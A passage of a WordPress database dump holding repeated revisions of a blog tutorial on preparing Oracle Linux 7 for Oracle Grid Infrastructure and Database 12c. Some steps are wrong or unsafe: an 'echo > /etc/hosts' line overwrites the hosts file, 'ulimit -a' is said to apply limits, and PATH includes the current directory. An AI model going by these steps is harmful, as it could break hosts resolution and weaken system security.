/u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 08:32:34','2020-02-02 08:32:34','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(30,2,'2020-02-02 08:34:20','2020-02-02 08:34:20','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br>\n<code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\n\nyum install kmod-oracleasm -y \nyum install oracleasm-support -y\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br><code>echo \"IP hostname hostname.domain\" > /etc/hosts </code><br> you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES</li>\n<li>SHMMNI = PAGE_SIZE</li>\n</ul>\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br>\n<code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br>\n<code>\npasswd oracle\npasswd grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 08:34:20','2020-02-02 08:34:20','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(31,2,'2020-02-02 08:36:23','2020-02-02 08:36:23','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br>\n<code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\n\nyum install kmod-oracleasm -y \nyum install oracleasm-support -y\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br><code>echo \"IP hostname hostname.domain\" > /etc/hosts </code><br> you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES</li>\n<li>SHMMNI = PAGE_SIZE</li>\n</ul>\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br><code>usermod -g oinstall -G dba,oper,asmdba,asmoper oracle usermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br><code>passwd oracle</code><br><code>passwd grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 08:36:23','2020-02-02 08:36:23','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(32,2,'2020-02-02 08:54:51','2020-02-02 08:54:51','{\n \"twentytwenty::background_color\": {\n \"value\": \"#020202\",\n \"type\": \"theme_mod\",\n \"user_id\": 2,\n \"date_modified_gmt\": \"2020-02-02 08:54:20\"\n },\n \"twentytwenty::accent_accessible_colors\": {\n \"value\": {\n \"content\": {\n \"text\": \"#ffffff\",\n \"accent\": \"#e41a50\",\n \"background\": \"#020202\",\n \"borders\": \"#262626\",\n \"secondary\": \"#7f7f7f\"\n },\n \"header-footer\": {\n \"text\": \"#000000\",\n \"accent\": \"#cd2653\",\n \"secondary\": \"#6d6d6d\",\n \"borders\": \"#dcd7ca\"\n }\n },\n \"type\": \"theme_mod\",\n \"user_id\": 2,\n \"date_modified_gmt\": \"2020-02-02 08:54:20\"\n }\n}','','','trash','closed','closed','','b94ea7dc-3498-4724-8e93-074acb8afa7a','','','2020-02-02 08:54:51','2020-02-02 08:54:51','',0,'http://ictbank.ir/blog/?p=32',0,'customize_changeset','',0),
(33,2,'2020-02-02 09:34:42','2020-02-02 09:34:42','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><code>yum install -y cloog-ppl libXxf86misc<br> yum install -y compat-libcap1 libXxf86vm<br> yum install -y compat-libstdc++-33 libaio-devel<br> yum install -y cpp libdmx<br> yum install -y gcc libstdc++-devel<br> yum install -y gcc-c++ mpfr<br> yum install -y glibc-devel make<br> yum install -y glibc-headers ppl<br> yum install -y kernel-headers xorg-x11-utils<br> yum install -y libXmu xorg-x11-xauth<br> yum install -y libXt libXv<br> yum install -y ksh libXxf86dga<br> yum install -y elfutils-libelf-devel<br> yum install -y sysstat<br> yum install -y smartmontools<br> yum install -y nfs-utils<br> yum install -y unzip<br> yum install -y net-tools<br>yum install kmod-oracleasm -y<br>yum install oracleasm-support -y</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><code> </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br><code>echo \"IP hostname hostname.domain\" > /etc/hosts </code><br> you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES</li>\n<li>SHMMNI = PAGE_SIZE</li>\n</ul>\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nto determine RAM size in bytes, you can use free command:<br><code>\nfree -b\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:<br>\n<code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <b>SHMMAX </b>\nkernel.shmall = <b>SHMALL </b>\nkernel.shmmni = <b>SHMMNI </b>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:<br>\n<code>\nsysctl -p\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:<br>\n<code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:<br><code>usermod -g oinstall -G dba,oper,asmdba,asmoper oracle usermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:<br><code>passwd oracle</code><br><code>passwd grid </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:<br>\n<code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:<br>\n<code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code><br>\nthen, you have to install an rpm file:<br>\n<code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:<br>\n<code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:<br>\n<code>\nulimit -a \n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:<br>\n<code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <b>grid</b>\nDefault group to own the driver interface [asmadmin]: <b>asmadmin</b>\nStart Oracle ASM library driver on boot (y/n) [y]: <b>y</b>\nScan for Oracle ASM disks on boot (y/n) [y]: <b>y</b>\nWriting Oracle ASM library driver configuration: done\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:<br>\n<code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:<br>\n<code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:<br>\n<code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:<br>\n<code>\nvi /home/grid/.bash_profile\n</code><br>\nand insert these records in it:<br>\n<code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:<br>\n<code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:34:42','2020-02-02 09:34:42','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(34,2,'2020-02-02 09:35:20','2020-02-02 09:35:20','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:<br> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>yum install -y cloog-ppl libXxf86misc<br>\n yum install -y compat-libcap1 libXxf86vm<br>\n yum install -y compat-libstdc++-33 libaio-devel<br>\n yum install -y cpp libdmx<br>\n yum install -y gcc libstdc++-devel<br>\n yum install -y gcc-c++ mpfr<br>\n yum install -y glibc-devel make<br>\n yum install -y glibc-headers ppl<br>\n yum install -y kernel-headers xorg-x11-utils<br>\n yum install -y libXmu xorg-x11-xauth<br>\n yum install -y libXt libXv<br>\n yum install -y ksh libXxf86dga<br>\n yum install -y elfutils-libelf-devel<br>\n yum install -y sysstat<br>\n yum install -y smartmontools<br>\n yum install -y nfs-utils<br>\n yum install -y unzip<br>\n yum install -y net-tools<br>\nyum install kmod-oracleasm -y<br>\nyum install oracleasm-support -y</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><code> </code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>yum install -y cloog-ppl libXxf86misc<br>\n yum install -y compat-libcap1 libXxf86vm<br>\n yum install -y compat-libstdc++-33 libaio-devel<br>\n yum install -y cpp libdmx<br>\n yum install -y gcc libstdc++-devel<br>\n yum install -y gcc-c++ mpfr<br>\n yum install -y glibc-devel make<br>\n yum install -y glibc-headers ppl<br>\n yum install -y kernel-headers xorg-x11-utils<br>\n yum install -y libXmu xorg-x11-xauth<br>\n yum install -y libXt libXv<br>\n yum install -y ksh libXxf86dga<br>\n yum install -y elfutils-libelf-devel<br>\n yum install -y sysstat<br>\n yum install -y smartmontools<br>\n yum install -y nfs-utils<br>\n yum install -y unzip<br>\n yum install -y net-tools<br>\nyum install kmod-oracleasm -y<br>\nyum install oracleasm-support -y</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:<br><code>echo \"IP hostname hostname.domain\" > /etc/hosts </code><br> you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / 